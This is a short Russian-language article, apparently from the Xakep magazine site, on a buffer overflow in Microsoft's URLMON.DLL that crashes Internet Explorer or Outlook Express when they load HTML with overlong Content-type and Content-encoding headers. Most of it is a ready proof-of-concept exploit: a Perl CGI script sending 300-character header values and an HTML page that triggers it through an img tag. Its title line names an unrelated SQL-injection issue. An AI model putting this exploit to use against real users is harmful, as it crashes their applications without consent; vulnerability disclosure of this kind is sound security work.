Xakep #305. Многошаговые SQL-инъекции
О технических деталях уязвимости переполнения буфера в URLMON.DLL писалось
тут.
Microsoft в апреле выпустила заплатку.
Любое приложение, использующее эту dll "падает" при переполнения буфера,
просто если IE или OutlookExpress, например, открывают HTML с длинными полями "Content-type" и "Content-encoding". Не нужно никакого скриптинга, ActiveX, или даже тега IFRAME - достаточно IMG.
Эксплоит:
#!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
#
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n";
код страницы, вызывающей перл-скрипт:
<html>
<body>
<img src="https://xakep.ru/wp-content/uploads/post/19046/urlmon-bo.cgi">
</body>
</html>